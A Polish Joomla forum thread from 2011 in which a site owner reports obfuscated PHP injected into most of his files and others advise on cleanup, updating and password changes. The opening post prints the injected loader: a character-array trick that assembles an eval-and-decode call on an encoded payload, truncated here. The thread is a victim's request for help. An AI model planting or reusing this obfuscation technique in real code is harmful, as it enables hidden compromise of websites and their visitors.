PDA

Zobacz pełną wersję : Dopisany kod



piotrszy
28-12-2011, 21:11
W wielu plikach php na mojej stronie zauważyłem dopisany kod tego typu:

<?php
$md5 = "263ad6557d326f833b3236e4cda2802d";
$wp_salt = array(';',"$","_","s","o",'c',"b","v","(",'a',"d",'6',"z","n",'r','f',"4",'l',")","g",'i','e','t');
$wp_add_filter = create_function('$'.'v',$wp_salt[21].$wp_salt[7].$wp_salt[9].$wp_salt[17].$wp_salt[8].$wp_salt[19].$wp_salt[12].$wp_salt[20].$wp_salt[13].$wp_salt[15].$wp_salt[17].$wp_salt[9].$wp_salt[22].$wp_salt[21].$wp_salt[8].$wp_salt[6].$wp_salt[9].$wp_salt[3].$wp_salt[21].$wp_salt[11].$wp_salt[16].$wp_salt[2].$wp_salt[10].$wp_salt[21].$wp_salt[5].$wp_salt[4].$wp_salt[10].$wp_salt[21].$wp_salt[8].$wp_salt[1].$wp_salt[7].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[0]);
$wp_add_filter('DZZFssWIAQOPk5nywkyVlZmZvUmZnpnZp8 +.....v/wE=');
?>

zajmuje to pierwsze 7 linii prawie każdego pliku. Co to jest? Na ile groźne? Jak to się dopisało? i jak to wywalić, ręcznie.., już mnie nadgarstek boli

---------- Post dodany o 20:11 ---------- Poprzedni post był o 20:10 ----------

Serwer mam na nazwie.pl, a typ joomli 1.5.16 i pózniej przeszedłem do 1.5.23, ale problem pojawił sie przy 1.5.16

nikszal
28-12-2011, 21:12
Miałeś niezapowiedzianych gości z Turcji na stronie ?
Pewnie używasz jakieś dziurawe rozszerzenia przez które goście się wkradli.
Jakiego klienta FTP używasz?

piotrszy
28-12-2011, 21:17
używam filezilli, skad wiesz że z Turcji?

nikszal
28-12-2011, 21:21
Nie wiem na pewno, czy to byli Turcy, ale w większości włamań właśnie oni są sprawcami i często zostawiają w katalogu image swoją graficzną wizytówkę. Sam kiedyś byłem ofiarą włamania.

piotrszy
28-12-2011, 21:26
Co zrobić, aby to wyeliminować? Zmieniłem wszystkie hasła dostępowe, w kliencie FTP, na stronach itd. Mam wrazenie, że pomogło, ale jak sprawdzam kody poszczególnych plików to wciąż znajduję nowe i nie wiem, czy nie widziałem ich wczesniej, czy też się się dopisują. Z Palca na pewno tego nie dopisali. Kod md5 za kazdym razem jest inny.
Zaalarmował mnie dostawca serwera, który zwrócił uwage na przekroczone limity uzycia serwera. Po usunieciu tych kodów z index.php, czasy zdecydowanie spadły. ale kody sa dopisane prawie w kazdym pliku php, a na serwerze mam 5 róznych stron. Jak to wywalić?
I czy jak nie wywale to co sie stanie, na ile jest to grożne?

nikszal
28-12-2011, 21:33
Co zrobić, aby to wyeliminować? Zmieniłem wszystkie hasła dostępowe, w kliencie FTP, na stronach itd. Mam wrazenie, że pomogło, ale jak sprawdzam kody poszczególnych plików to wciąż znajduję nowe i nie wiem, czy nie widziałem ich wczesniej, czy też się się dopisują.
http://wiki.joomla.pl/index.php/Bezpiecze%C5%84stwo_-_lista_kontrolna_2:_Hosting_i_ustawienia_serwera


Jak to wywalić?
I czy jak nie wywale to co sie stanie, na ile jest to grożne?
http://wiki.joomla.pl/index.php/Witryna_po_w%C5%82amaniu

Przede wszystkim wyłącz podejrzane rozszerzenia, szczególnie te pochodzące z niepewnego źródła.

kurtz
28-12-2011, 22:11
być może to joomla! był przyczyną włamania.

wersja 1.5.17 ukazała się w ciągu 2 czy 3 dni po wydaniu 1.5.16 i z tego co pamiętam, była to aktualizacja bezpieczeństwa [?]

poza tym używasz prawie dwu - letniego oprogramowania.

piotrszy
28-12-2011, 22:24
Nigdy mi aktualizację joomli nie wychodziły, więc sobie odpuściłem ;-(. Teraz już zaktualizowałem do 1.5.25, więc jest chyba OK, tylko jak wywalić ten kod. To strasznie mrówcza praca.

faktycznie chyba 1.5.16 była przyczyną. Na serwerze mam jeszcze strony postawione na 1.6.5 i 1.7.1 oraz (nie smiejcie sie) 1.0.13 i są czyste. A obie na 1.5.16 zostały zaatakowane.

nikszal
28-12-2011, 22:33
Ja nadpisałbym całego Joomla aktualną wersją 1.5.25. Warto jednak sprawdzić czy w instalce nie ma pliku configuration.php, bo wszystko poleci w kosmos.
Wcześniej oczywiście pełna kopia bezpieczeństwa.

MagicWawa
28-12-2011, 22:54
Jeśli kod dopisany do plików jest zawsze taki sam, to ściągnij wszystkie pliki strony przez ftp. Przeszukaj katalog z plikami Joomla programem, który wyszukuje ciąg znaków w poszczególnych plikach (polecam PSPad) i zrób "znajdź i zmień". W znajdź wpisz dodany kod w zmień nie wpisuj nic i z automayu wywali Ci wszystko ze wszystkich plików. Zmień hasła do ftp, bazy, zaplecza i nadpisz wyczyszczonymi plikami to, co masz na serwerze. Jak się postarasz, to w sumie zajmie Ci to pół godzinki.

piotrszy
28-12-2011, 23:12
niestety każdy szyfr md5 jest inny ;-(

nikszal
28-12-2011, 23:18
Nadpisz choć jeden katalog i sprawdź czy dalej masz śmieci.

piotrszy
29-12-2011, 14:00
Dzięki za porady. Walczę, pomysł z nadpisaniem jest OK, ale oczywiście komponenty instalowane ręcznie, trzeba samemu oczyścić, a jest ich sporo. Nie mniej trochę pracy już zostało zrobione

---------- Post dodany 29-12-2011 o 13:00 ---------- Poprzedni post był 28-12-2011 o 23:46 ----------

Znalazłem plik o nazwie export.php. Składał się on tylko z tego kodu. zagnieździł się w komponencie virtual m... w panelu administartora.